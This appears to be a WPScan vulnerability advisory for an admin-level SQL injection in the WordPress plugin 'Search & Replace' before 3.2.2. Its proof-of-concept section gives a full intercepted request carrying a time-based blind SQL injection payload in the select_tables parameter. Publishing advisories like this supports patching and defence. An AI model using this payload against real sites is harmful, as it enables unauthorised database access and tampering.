WPVDB-ID: 7D5B8764-C82D-4969-A707-F38B63BCADCA
Source: wpvulndb (wpscan.com)
Author: Krugov Aryom
Published: May 23, 2024

Search & Replace < 3.2.2 - Admin+ SQL injection

Tags: plugin, sql injection, vulnerability, poc, june 06 2024

AI Score: 7.2 High (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description

The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks (such as within a multi-site network).

PoC

1. Go to the Tools menu.
2. Select Search & Replace.
3. Click "Do Search & Replace".
4. Change the parameters and intercept the request.
5. Put a vulnerable SQL query in the request, such as the following:

   search=123&replace=1&csv=1&select_tables%5B%5D=(SELECT+9255+FROM+(SELECT(SLEEP(1-(IF(44=44,0,5)))))cCQl)&export_or_save=1&action=search-replace&search-submit=123123"asdasd=''&insr_nonce=0590310227&_wp_http_referer=%2Fwp-admin%2Ftools.php%3Fpage%3Dsearch-replace

6. Notice that the response is delayed by twice the number of seconds given to SLEEP().

CPE
Name: (not given)  Operator: eq  Version: 3.2.2

